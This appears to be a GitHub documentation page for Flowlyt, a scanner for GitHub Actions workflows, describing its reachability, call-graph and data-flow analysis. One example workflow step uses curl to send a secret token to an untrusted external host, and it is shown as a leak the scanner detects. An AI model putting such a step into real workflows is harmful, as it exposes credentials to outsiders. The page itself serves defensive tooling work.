AST-Based Reachability and Call Graph Analysis

This document describes the new AST-based analysis capabilities in Flowlyt that enable reachability analysis and call graph analysis to reduce false positives and catch issues in reachable code paths.

Overview

The AST-enhanced analysis engine extends Flowlyt's existing hybrid engine with:

Reachability Analysis - Determines which parts of workflows are actually reachable during execution
Call Graph Analysis - Builds a graph of dependencies and calls between jobs, steps, and actions
Data Flow Analysis - Tracks how sensitive data flows through the workflow
False Positive Reduction - Filters out findings in unreachable code paths

Architecture

Core Components

1. AST Analyzer (`pkg/analysis/ast/ast.go`)

The main orchestrator that coordinates parsing, reachability, and data flow analysis.

type ASTAnalyzer struct {
    callGraph    *CallGraph
    dataFlow     *DataFlowAnalyzer  
    reachability *ReachabilityAnalyzer
}

2. Call Graph (`pkg/analysis/ast/callgraph.go`)

Builds and maintains a graph of workflow components and their relationships.

type CallGraph struct {
    nodes map[string]*CallNode
    edges map[string][]string
}

3. Reachability Analyzer (`pkg/analysis/ast/reachability.go`)

Determines which nodes are reachable from entry points (triggers).

type ReachabilityAnalyzer struct {
    callGraph      *CallGraph
    reachableNodes map[string]bool
    conditions     map[string]*ConditionAnalyzer
}

4. Data Flow Analyzer (`pkg/analysis/ast/dataflow.go`)

Tracks data sources, sinks, and flows to identify potential security issues.

type DataFlowAnalyzer struct {
    sources map[string]*DataSource
    sinks   map[string]*DataSink
    flows   []*DataFlow
}

Key Features

Reachability Analysis

The reachability analyzer determines which parts of a workflow can actually be executed:

Entry Point Detection: Identifies workflow triggers as entry points
Dependency Tracking: Follows job dependencies (needs relationships)
Conditional Analysis: Evaluates if conditions to determine reachability
Static Evaluation: Performs static analysis on simple conditions

Example of unreachable code detection:

jobs:
  never-runs:
    if: false  # Statically false condition
    runs-on: ubuntu-latest
    steps:
      - run: echo "This will never execute"
        env:
          SECRET: ${{ secrets.API_KEY }}  # Finding here would be false positive

Call Graph Analysis

Builds a comprehensive graph of workflow components:

Node Types:
- trigger - Workflow triggers (push, PR, etc.)
- job - Individual jobs
- step - Steps within jobs
- action - External actions being used
- external_call - Network calls, file operations, etc.
Edge Types:
- Trigger to job relationships
- Job dependency relationships (needs)
- Step execution order
- Action invocations
- External command calls

Data Flow Analysis

Tracks sensitive data movement through workflows:

Data Sources:
- Secrets (${{ secrets.* }})
- GitHub context (${{ github.* }})
- Environment variables
- Action outputs
Data Sinks:
- Network calls (curl, wget)
- File operations
- Logging commands
- Action inputs
Flow Detection:
- Identifies when sensitive data reaches potentially unsafe sinks
- Calculates severity based on data sensitivity and sink risk
- Provides detailed remediation advice

Usage

Basic Usage

import (
    "github.com/harekrishnarai/flowlyt/pkg/engine"
    "github.com/harekrishnarai/flowlyt/pkg/parser"
)

// Create enhanced engine with AST analysis
config := engine.DefaultASTEnhancedConfig()
config.EnableReachabilityAnalysis = true
config.EnableDataFlowAnalysis = true
config.FilterUnreachableFindings = true

enhancedEngine, err := engine.NewASTEnhancedEngine(config)
if err != nil {
    log.Fatal(err)
}

// Analyze workflows
workflowFiles := []parser.WorkflowFile{
    {Path: ".github/workflows/ci.yml", Content: workflowContent},
}

result, err := enhancedEngine.AnalyzeWithAST(context.Background(), workflowFiles)
if err != nil {
    log.Fatal(err)
}

// Access enhanced results
fmt.Printf("Reachable nodes: %d\n", result.ReachabilityReport.ReachableNodes)
fmt.Printf("Data flow findings: %d\n", len(result.DataFlowFindings))
fmt.Printf("Filtered findings: %d\n", result.FilteredFindings)

Configuration Options

type ASTEnhancedConfig struct {
    EnableReachabilityAnalysis bool   // Enable reachability analysis
    EnableDataFlowAnalysis     bool   // Enable data flow tracking
    EnableCallGraphAnalysis    bool   // Enable call graph construction
    FilterUnreachableFindings  bool   // Filter findings in unreachable code
    MinDataFlowSeverity       string // Minimum severity for data flow findings
    ReachabilityConfig        ReachabilityConfig
}

type ReachabilityConfig struct {
    AnalyzeConditionals      bool // Analyze conditional expressions
    StaticEvaluation         bool // Perform static evaluation of conditions
    MarkUnreachableFindings  bool // Mark unreachable findings instead of filtering
    ReportUnreachableCode    bool // Include unreachable code in reports
}

Benefits

1. Reduced False Positives

By filtering out findings in unreachable code paths, the analysis becomes more precise:

jobs:
  security-scan:
    if: github.event_name == 'never'  # Will never be true
    steps:
      - run: echo ${{ secrets.API_KEY }}  # Finding filtered out as unreachable

2. Enhanced Detection

Data flow analysis catches complex security issues:

steps:
  - name: Get API data
    run: |
      # Data flow analysis detects secret exposure via network
      curl -H "Auth: ${{ secrets.TOKEN }}" https://untrusted.com/api

3. Context Awareness

Understanding job dependencies and execution flow:

jobs:
  build:
    outputs:
      version: ${{ steps.version.outputs.version }}
    steps:
      - id: version
        run: echo "version=1.0.0" >> $GITHUB_OUTPUT
  
  deploy:
    needs: build
    steps:
      - run: |
          # Analysis understands this depends on build job output
          echo "Deploying version ${{ needs.build.outputs.version }}"

Security Rules Enhanced

The AST analysis enhances existing security rules and adds new categories:

New Rule Categories

CategoryReachability - Issues related to unreachable code
CategoryDataFlow - Data flow security violations
CategoryCallGraph - Issues detected through call graph analysis

Enhanced Detection

Secret Exposure: Tracks secret usage from source to potential leak points
Privilege Escalation: Analyzes permission flows and escalation paths
Supply Chain: Maps action dependencies and external calls
Data Exfiltration: Detects sensitive data sent to external endpoints

Performance Considerations

The AST analysis adds computational overhead but provides significant security benefits:

Parsing: ~10-20ms per workflow file
Call Graph: ~5-10ms per workflow
Reachability: ~10-30ms depending on complexity
Data Flow: ~20-50ms depending on sources/sinks

Total overhead is typically 50-100ms per workflow, which is acceptable for most use cases.

Limitations

Dynamic Conditions: Cannot analyze conditions that depend on runtime values
Complex Expressions: Limited static evaluation of complex conditional logic
Cross-Workflow: Currently analyzes workflows in isolation
Action Internals: Cannot see inside third-party actions

Future Enhancements

Cross-Workflow Analysis: Track dependencies between workflows
Dynamic Analysis: Integrate with runtime information
Action Scanning: Deep analysis of popular GitHub Actions
Machine Learning: Use ML to improve condition analysis
Performance Optimization: Caching and incremental analysis

Integration with Existing Rules

The AST analysis works alongside existing pattern-based rules:

Pattern Rules: Continue to work for basic detection
AST Enhancement: Provides additional context and filtering
Combined Results: Merges findings from both approaches
Confidence Scoring: AST analysis can increase confidence in findings

This creates a layered security approach that combines the speed of pattern matching with the precision of AST analysis.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

AST-Based Reachability and Call Graph Analysis

Overview

Architecture

Core Components

1. AST Analyzer (`pkg/analysis/ast/ast.go`)

2. Call Graph (`pkg/analysis/ast/callgraph.go`)

3. Reachability Analyzer (`pkg/analysis/ast/reachability.go`)

4. Data Flow Analyzer (`pkg/analysis/ast/dataflow.go`)

Key Features

Reachability Analysis

Call Graph Analysis

Data Flow Analysis

Usage

Basic Usage

Configuration Options

Benefits

1. Reduced False Positives

2. Enhanced Detection

3. Context Awareness

Security Rules Enhanced

New Rule Categories

Enhanced Detection

Performance Considerations

Limitations

Future Enhancements

Integration with Existing Rules

FilesExpand file tree

ast-analysis.md

Latest commit

History

ast-analysis.md

File metadata and controls

AST-Based Reachability and Call Graph Analysis

Overview

Architecture

Core Components

1. AST Analyzer (pkg/analysis/ast/ast.go)

2. Call Graph (pkg/analysis/ast/callgraph.go)

3. Reachability Analyzer (pkg/analysis/ast/reachability.go)

4. Data Flow Analyzer (pkg/analysis/ast/dataflow.go)

Key Features

Reachability Analysis

Call Graph Analysis

Data Flow Analysis

Usage

Basic Usage

Configuration Options

Benefits

1. Reduced False Positives

2. Enhanced Detection

3. Context Awareness

Security Rules Enhanced

New Rule Categories

Enhanced Detection

Performance Considerations

Limitations

Future Enhancements

Integration with Existing Rules

1. AST Analyzer (`pkg/analysis/ast/ast.go`)

2. Call Graph (`pkg/analysis/ast/callgraph.go`)

3. Reachability Analyzer (`pkg/analysis/ast/reachability.go`)

4. Data Flow Analyzer (`pkg/analysis/ast/dataflow.go`)